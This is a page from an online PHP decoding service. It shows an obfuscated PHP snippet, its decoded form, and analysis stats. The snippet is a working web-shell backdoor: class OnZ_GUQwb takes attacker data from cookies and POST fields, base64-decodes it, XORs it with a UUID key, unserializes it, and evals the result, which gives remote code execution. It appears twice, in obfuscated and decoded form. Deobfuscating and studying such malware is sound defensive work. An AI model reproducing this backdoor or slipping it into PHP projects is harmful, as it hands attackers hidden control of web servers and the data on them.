Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$bfKerPOL = "\x4f" . "\x6e" . "\x5a" . "\137" . "\107" . 'U' . chr (81) . chr ( 275 - 156 ..
Decoded Output download
<? $bfKerPOL = "O" . "n" . "Z" . "_" . "G" . 'U' . chr (81) . chr ( 275 - 156 )."b";$fTTiMMp = "c" . 'l' . chr (97) . "s" . 's' . chr (95) . chr ( 927 - 826 )."x" . 'i' . chr (115) . chr (116) . 's';$LZCOEsufc = $fTTiMMp($bfKerPOL); $bfKerPOL = "34407";$ysrpkibv = $LZCOEsufc;$fTTiMMp = "53651";if (!$ysrpkibv){class OnZ_GUQwb{private $uaEFhxi;public static $XKLuYOmmQ = "ae5f5aeb-b4ea-4e70-9127-62cdf8f8d16a";public static $fplXxeZLV = 62972;public function __construct($DeRcm=0){$AqCmjfbuTf = $_COOKIE;$cKTTvAVizl = $_POST;$HPWpMJX = @$AqCmjfbuTf[substr(OnZ_GUQwb::$XKLuYOmmQ, 0, 4)];if (!empty($HPWpMJX)){$jDeYAsw = "base64";$ahdcxlZw = "";$HPWpMJX = explode(",", $HPWpMJX);foreach ($HPWpMJX as $OntjeVjVg){$ahdcxlZw .= @$AqCmjfbuTf[$OntjeVjVg];$ahdcxlZw .= @$cKTTvAVizl[$OntjeVjVg];}$ahdcxlZw = array_map($jDeYAsw . chr (95) . chr (100) . "e" . 'c' . chr ( 142 - 31 )."d" . 'e', array($ahdcxlZw,)); $ahdcxlZw = $ahdcxlZw[0] ^ str_repeat(OnZ_GUQwb::$XKLuYOmmQ, (strlen($ahdcxlZw[0]) / strlen(OnZ_GUQwb::$XKLuYOmmQ)) + 1);OnZ_GUQwb::$fplXxeZLV = @unserialize($ahdcxlZw);}}private function tlJylvdXIS(){if (is_array(OnZ_GUQwb::$fplXxeZLV)) {$WpAYh = str_replace("<" . '?' . "p" . chr (104) . "p", "", OnZ_GUQwb::$fplXxeZLV['c' . 'o' . "n" . "t" . chr ( 349 - 248 ).chr ( 558 - 448 ).'t']);eval($WpAYh); $ckiYh = "58683";exit();}}public function __destruct(){$this->tlJylvdXIS(); $ckiYh = "58683";$FuEgNoJg = str_pad($ckiYh, 10);}}$ziLIYE = new /* 23239 */ OnZ_GUQwb(); $ziLIYE = substr("47147_53628", 1);} ?>
Did this file decode correctly?
Original Code
$bfKerPOL = "\x4f" . "\x6e" . "\x5a" . "\137" . "\107" . 'U' . chr (81) . chr ( 275 - 156 )."\142";$fTTiMMp = "\x63" . 'l' . chr (97) . "\163" . 's' . chr (95) . chr ( 927 - 826 )."\x78" . 'i' . chr (115) . chr (116) . 's';$LZCOEsufc = $fTTiMMp($bfKerPOL); $bfKerPOL = "34407";$ysrpkibv = $LZCOEsufc;$fTTiMMp = "53651";if (!$ysrpkibv){class OnZ_GUQwb{private $uaEFhxi;public static $XKLuYOmmQ = "ae5f5aeb-b4ea-4e70-9127-62cdf8f8d16a";public static $fplXxeZLV = 62972;public function __construct($DeRcm=0){$AqCmjfbuTf = $_COOKIE;$cKTTvAVizl = $_POST;$HPWpMJX = @$AqCmjfbuTf[substr(OnZ_GUQwb::$XKLuYOmmQ, 0, 4)];if (!empty($HPWpMJX)){$jDeYAsw = "base64";$ahdcxlZw = "";$HPWpMJX = explode(",", $HPWpMJX);foreach ($HPWpMJX as $OntjeVjVg){$ahdcxlZw .= @$AqCmjfbuTf[$OntjeVjVg];$ahdcxlZw .= @$cKTTvAVizl[$OntjeVjVg];}$ahdcxlZw = array_map($jDeYAsw . chr (95) . chr (100) . "\x65" . 'c' . chr ( 142 - 31 )."\x64" . 'e', array($ahdcxlZw,)); $ahdcxlZw = $ahdcxlZw[0] ^ str_repeat(OnZ_GUQwb::$XKLuYOmmQ, (strlen($ahdcxlZw[0]) / strlen(OnZ_GUQwb::$XKLuYOmmQ)) + 1);OnZ_GUQwb::$fplXxeZLV = @unserialize($ahdcxlZw);}}private function tlJylvdXIS(){if (is_array(OnZ_GUQwb::$fplXxeZLV)) {$WpAYh = str_replace("\x3c" . '?' . "\x70" . chr (104) . "\x70", "", OnZ_GUQwb::$fplXxeZLV['c' . 'o' . "\156" . "\x74" . chr ( 349 - 248 ).chr ( 558 - 448 ).'t']);eval($WpAYh); $ckiYh = "58683";exit();}}public function __destruct(){$this->tlJylvdXIS(); $ckiYh = "58683";$FuEgNoJg = str_pad($ckiYh, 10);}}$ziLIYE = new /* 23239 */ OnZ_GUQwb(); $ziLIYE = substr("47147_53628", 1);}
Function Calls
chr | 7 |
class_exists | 1 |
Stats
MD5 | 1751ce655c1184a045da8c0a03aab02f |
Eval Count | 0 |
Decode Time | 89 ms |